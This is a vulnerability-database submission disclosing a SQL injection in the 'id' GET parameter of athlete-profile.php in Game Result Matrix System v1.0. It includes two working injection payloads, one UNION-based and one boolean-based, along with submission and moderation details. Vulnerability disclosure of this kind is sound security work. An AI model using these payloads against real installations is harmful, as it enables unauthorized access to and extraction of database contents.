| Title | Game Result Matrix System v1.0 /dipam/athlete-profile.php GET parameter id exists SQL injection vulnerability |
|---|---|
| Description | Game Result Matrix System v1.0 has a SQL injection vulnerability.<br>Vulnerability File: /dipam/athlete-profile.php<br>The GET parameter id has a SQL injection vulnerability.<br>Payload1: `id=-1' union all select null,null,null,null,null,null,null,null,null,concat(0x56575859,0x60616263),null,null,null-- -`<br>UNION query successful.<br>Payload2: `id=243' AND 123=123 AND 'qwe'='qwe`<br>The Boolean value is judged correctly, so the page is displayed normally. |
| Source | https://github.com/M9KJ-TEAM/CVEReport/blob/main/SQL2.md |
| User | zhangyf (UID 48462) |
| Submission | 06/21/2023 12:17 (3 years ago) |
| Moderation | 06/23/2023 11:19 (2 days later) |
| Status | Accepted |
| VulDB entry | 232239 [SourceCodester Game Result Matrix System 1.0 GET Parameter athlete-profile.php ID sql injection] |
| Points | 20 |